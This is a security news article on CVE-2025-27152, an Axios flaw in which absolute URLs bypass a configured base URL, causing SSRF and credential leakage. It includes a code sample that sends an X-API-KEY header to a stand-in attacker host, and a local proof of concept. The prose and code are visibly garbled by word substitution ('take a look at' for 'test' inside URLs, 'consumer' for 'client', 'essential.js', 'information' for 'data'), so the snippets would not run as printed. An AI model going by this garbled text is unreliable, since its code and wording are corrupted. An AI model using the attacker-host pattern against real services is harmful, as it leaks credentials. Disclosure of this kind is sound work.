A crucial safety situation has been recognized within the Axios bundle for JavaScript, which poses important dangers to thousands and thousands of servers as a consequence of server-side request forgery (SSRF) and credential leakage.
This vulnerability happens when absolute URLs are utilized in Axios requests, even when a base URL is specified.
CVE-2025-27152 Overview
The vulnerability related to Axios is recognized by the CVE ID CVE-2025-27152. It impacts variations of Axios lower than or equal to 1.7.9 and has been rated with a reasonable severity degree.
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://instance.take a look at/api/v1/customers/",
headers: {
"X-API-KEY": "1234567890",
},
});
// Instance of an absolute URL being handed
const userId = "http://attacker.take a look at/";
// SSRF Vulnerability Instanceawait internalAPIClient.get(userId); // Sends request to http://attacker.take a look at/ as an alternative of the baseURL
Within the code snippet above, despite the fact that a base URL is about for the Axios consumer, passing an absolute URL to the get() methodology results in requests being despatched on to the desired absolute URL.
This bypasses the supposed safety mechanisms, as delicate credentials such because the X-API-KEY are included within the request headers and may be leaked to unintended hosts.
Proof of Idea
To reveal this vulnerability, a easy proof of idea (PoC) may be arrange utilizing two native HTTP servers.
- Setup Servers:
mkdir /tmp/server1 /tmp/server2
echo "that is server1" > /tmp/server1/index.html
echo "that is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &- Create a Check Script (essential.js):
import axios from "axios";
const consumer = axios.create({ baseURL: "http://localhost:10001/" });
const response = await consumer.get("http://localhost:10002/");
console.log(response.information);- Run the Script:
node essential.jsThe output will probably be “that is server2,” indicating that the request was efficiently redirected to the unintended server.
Influence and Mitigation
The vulnerability poses two essential dangers:
- Credential Leakage: Delicate API keys or credentials is perhaps uncovered to third-party hosts if an absolute URL is handed.
- SSRF (Server-Aspect Request Forgery): Attackers can leverage this exploit to make unauthorized requests to inner community hosts.
To mitigate this threat, customers ought to replace to Axios model 1.8.2 or later, the place the problem has been fastened. Moreover, implementing strict validation for any user-provided URLs is essential to stop SSRF assaults.
The vulnerability was reported by @lambdasawa shared in Github, including emphasis on the significance of group involvement in software program safety.
This current safety situation highlights the necessity for diligence in managing dependencies and validating inputs, particularly with extensively used libraries like Axios.
By updating to patched variations and implementing strong safety practices, builders can defend their purposes and inner networks from SSRF and credential leakage threats.
Are you from SOC/DFIR Groups? – Analyse Malware Incidents & get reside Entry with ANY.RUN -> Begin Now for Free.